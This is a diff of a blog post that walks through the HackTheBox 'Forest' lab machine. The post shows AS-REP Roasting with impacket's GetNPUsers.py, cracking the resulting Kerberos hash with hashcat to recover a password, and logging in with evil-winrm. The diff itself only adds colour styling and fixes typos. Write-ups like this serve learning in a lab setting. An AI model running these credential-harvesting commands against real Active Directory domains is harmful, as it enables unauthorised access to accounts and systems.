achla95/achla95.github.io/content/posts/HackTheBox-Forest.md

 user:[mark] rid:[0x47f]
 user:[santi] rid:[0x480]
 ```
-Above you can see a list of potential user which might be vulnerable to something.
+Above you can see a list of potential user which might be  <span style="color:#85B5EB">vulnerable</span> to something.

 ## **Own user svc-alfresco**

  Now what can we do with these users ?
-We can use a method called AS-REP Roasting to get the password hashes of these users.
+We can use a method called  <span style="color:#85B5EB">AS-REP Roasting</span>  to get the password hashes of these users.
-This method require the user to have the "don't require Kerberos pre-authentication" option enabled.
+This method require the user to have the <span style="color:#85B5EB"> don't require Kerberos pre-authentication</span>  option enabled.
 We can check this with a script from impacket collection :
 ```
 /opt/tool/impacket/examples/GetNPUsers.py -no-pass -dc-ip 10.10.10.161 -usersfile users.txt htb/
 ```
 Jackpot !
-We got the hashe of the user svc-alfresco.
+We got the hash of the user <span style="color:#85B5EB">svc-alfresco</span>.
 We can crack his hashes with hashcat :
 ```
 hashcat -m 18200 svc-alfresco.kerb /usr/share/wordlists/rockyou.txt
 ```
-Hashcat easily cracked the password : s3rvice.
+Hashcat easily cracked the password : <span style="color:#85B5EB">s3rvice</span>.

-Finally we can use these credentials to log in as svc-alfresco using Evil-WinRM :
+Finally we can use these credentials to log in as svc-alfresco using <span style="color:#85B5EB">Evil-WinRM</span> :

 ```
 kali@kali# evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice